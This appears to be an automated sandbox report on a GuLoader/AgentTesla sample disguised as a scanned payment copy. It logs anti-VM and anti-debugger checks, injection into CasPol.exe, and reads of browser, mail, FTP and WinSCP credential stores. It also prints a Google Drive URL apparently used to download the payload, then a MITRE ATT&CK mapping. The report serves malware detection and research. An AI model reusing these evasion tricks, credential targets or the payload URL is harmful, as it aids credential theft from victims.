            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000006.00000000.44493194249.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeCode function: 1_2_0040756B push 934A6E33h; ret
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeCode function: 1_2_0040611D push 9754E4D4h; ret
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeCode function: 1_2_00409A3E push B1F2CAE9h; ret
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeCode function: 1_2_00405B8B push cs; retf
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeCode function: 1_2_023322C1 push cs; iretd
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeCode function: 1_2_02332716 push es; iretd
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeCode function: 1_2_02332B57 push es; iretd
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeCode function: 1_2_0233281E push es; iretd
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeCode function: 1_2_02334470 pushfd ; iretd
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeCode function: 1_2_023334C5 push ebp; retf
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeCode function: 1_2_023349C1 pushfd ; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1CF65658 pushfd ; retf
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679766383.00000000039F0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
            Source: CasPol.exe, 00000006.00000002.49382267477.0000000000B50000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1IINS60L202FEGNX6V3EUFJEUKV3OYNXZ
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679766383.00000000039F0000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49382267477.0000000000B50000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44677293770.0000000000643000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6908Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9947
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeSystem information queried: ModuleInformation
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679766383.00000000039F0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000006.00000003.45582358032.000000000111A000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383620135.000000000111A000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000002.49383099264.00000000010A6000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: CasPol.exe, 00000006.00000002.49382267477.0000000000B50000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679766383.00000000039F0000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49382267477.0000000000B50000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44679850654.0000000003AB9000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44677293770.0000000000643000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: CasPol.exe, 00000006.00000002.49385615222.0000000002D29000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00E46950 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F00000
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
            Source: CasPol.exe, 00000006.00000002.49385182683.00000000018D0000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: CasPol.exe, 00000006.00000002.49385182683.00000000018D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CasPol.exe, 00000006.00000002.49385182683.00000000018D0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: CasPol.exe, 00000006.00000002.49385182683.00000000018D0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1428, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1428, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1428, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol123Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
